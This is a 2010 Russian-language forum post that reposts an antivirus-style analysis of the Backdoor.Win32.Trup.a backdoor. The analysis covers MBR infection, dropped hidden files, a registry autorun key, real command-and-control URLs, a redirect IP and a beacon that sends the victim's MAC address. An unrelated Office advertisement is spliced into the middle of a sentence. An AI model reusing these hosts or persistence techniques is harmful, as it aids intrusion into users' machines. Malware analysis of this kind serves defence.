Тем: 4,522, Сообщений: 353,446, Пользователи: 158,523
На форуме: 7

Вернуться   Форум VolSat > Электронный мир > Программы / Software

Важная информация


 
 
Опции темы Опции просмотра Language
Старый 16.06.2010, 20:29   #11
Tuflya07
Гуру
 
Аватар для Tuflya07
 
Регистрация: 07.10.2007
Ресивер: Openbox X-800
Сообщений: 10,465
Сказал(а) спасибо: 2,818
Поблагодарили 5,637 раз(а) в 4,437 сообщениях
Вес репутации: 47
Tuflya07 просто великолепная личностьTuflya07 просто великолепная личностьTuflya07 просто великолепная личностьTuflya07 просто великолепная личностьTuflya07 просто великолепная личностьTuflya07 просто великолепная личностьTuflya07 просто великолепная личностьTuflya07 просто великолепная личность
По умолчанию

Backdoor.Win32. Trup.a

14 июня, 2010


Вредоносная программа, предоставляющая злоумышленнику удаленный доступ к зараженной машине. Программа является приложением Windows (PE EXE-файл). Имеет размер 24576 байт. Написана на С++.
Инсталляция

После активации бэкдор инфицирует Mbr (Master Boot Record). Таким образом при загрузке mbr из первых 37 секторов считывает и расшифровывает основной код вредоноса, после чего из 38 сектора считывает и расшифровывает копию оригинального Mbr (шифр меняет местами тетрады в байте) и продолжается загрузка ОС.

Далее создается поток, который создает файл на винчестере:
%WinDir%\ali.exe
Данный файл имеет размер 17408 байт. Детектируется Антивирусом Касперского, как оригинальное тело бэкдора Backdoor.Win32.Trup.a. и создается ключ автозагрузки:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"qQ" = "%WinDir%\ali.exe"
После запуска файла "%WinDir%\ali.exe", удаляется ключ автозагрузки и при помощи функции "rename" файл "ali.exe" перемещается во временный каталог текущего пользователя Windows под именем "110.txt":
%Temp%\110.txt
Также во временном каталоге текущего пользователя Windows создается копия тела бэкдора под именем "124.txt":
%Temp%\124.txt
Всем созданным файлам присваивается атрибут "скрытый".
Деструктивная активность

Для контроля уникальности своего процесса в системе бэкдор создает уникальный идентификатор с именем:
LockIE..
Бэкдор создает поток, который периодически загружает зашифрованный файл конфигурации в кеш IE со следующего URL:
http://list.577q.com/sms/xxx.ini
Далее файл расшифровывается и сохраняется в корневой каталог Windows под именем "Win.ini":
%WinDir%\Win.ini
Бэкдор из файла конфигурации получает ссылку для загрузки файла. Загруженный файл сохраняется в кеш IE, после чего запускается на выполнение. На момент создания описания ссылки для загрузки файла не было.

Также считывает из указанного выше файла URL. Если пользователь работает с браузером Internet Explorer, TheWorld Browser, SOGOUEXPLORER или QQ, то будет он будет перенаправлен по ссылке, считанной из файла. На момент составления описания браузер переправлялся по ссылке
http://66.79.168.187:55325/tuling.html
Отправляет следующий HTTP запрос на сервер злоумышленнику:
http://list.577q.com/sms/do.phpuserid=<rnd1>&time=<rnd2>&msg
=<rnd3>&pauid=1
Где <rnd1> - физический адрес сетевой карты, <rnd2> - текущая дата и время, Купи в Softkey 10 корпоративных лицензий Microsoft Office 2010 и получи подарок!
До 30 июня всем покупателям корпоративных лицензий Microsoft Office 2010 в Softkey бонусные карты "М.Видео", "Л'Этуаль" и "Спортмастер" от 1000 рублей в ПОДАРОК!
<rnd3> - последовательность цифр, например "01704800628118".
__________________
Tuflya07 вне форума   Ответить с цитированием
Пользователь сказал cпасибо:
 


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

DigitalOcean Referral Badge

Текущее время: 04:13. Часовой пояс GMT +3.
volsat.com.ua